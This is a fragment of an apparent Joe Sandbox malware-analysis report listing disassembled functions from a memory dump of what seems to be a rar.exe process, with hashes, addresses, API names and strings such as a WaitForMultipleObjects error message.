                                                                                                                                                                      • Opcode ID: 029dc5b3afc22f1748ed18b4bb1637acba6cd1f0e3e62fcee6acc39158075de8
                                                                                                                                                                      • Instruction ID: d8021c975d536d73398d1d7238dd37b528ecf943ac33b27f7cd38af72f26f2b2
                                                                                                                                                                      • Opcode Fuzzy Hash: 029dc5b3afc22f1748ed18b4bb1637acba6cd1f0e3e62fcee6acc39158075de8
                                                                                                                                                                      • Instruction Fuzzy Hash: A6119062B04B4185EB009F16EC04268B7A5FBA8FC1F168435DE4DC3324EFBDE561C249
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE735DB4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: swprintf
                                                                                                                                                                      • String ID: ;%%0%du
                                                                                                                                                                      • API String ID: 233258989-2249936285
                                                                                                                                                                      • Opcode ID: 5630f68361fdad429f81d227d618e3426730f2a1c59dfa690c7e09baebf2de4d
                                                                                                                                                                      • Instruction ID: 81025453f666701306f7e15ef0fa7d689325d8c87742e1cb67a7400f008ab727
                                                                                                                                                                      • Opcode Fuzzy Hash: 5630f68361fdad429f81d227d618e3426730f2a1c59dfa690c7e09baebf2de4d
                                                                                                                                                                      • Instruction Fuzzy Hash: 2211C823B1868042EB60DB24E0143E97760FBA4B44F464031FF8C87799DE7ED955CB45
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE77B974 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16synchronizationCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorExceptionLastObjectSingleThrowWait
                                                                                                                                                                      • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                                                                                                      • API String ID: 564652978-2248577382
                                                                                                                                                                      • Opcode ID: 46226563a9827009269dbdda457766bca55c7f33c1314a041e0b52dd23cb2e00
                                                                                                                                                                      • Instruction ID: 49ce2ab6abad5da6417ea8f7ca14256af20a23ae96e5b999d75353aea78b64f0
                                                                                                                                                                      • Opcode Fuzzy Hash: 46226563a9827009269dbdda457766bca55c7f33c1314a041e0b52dd23cb2e00
                                                                                                                                                                      • Instruction Fuzzy Hash: 24E0E523F4880282EF00A724E8852A43291AF75765F920731F03EC61E59FAEA566C30A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%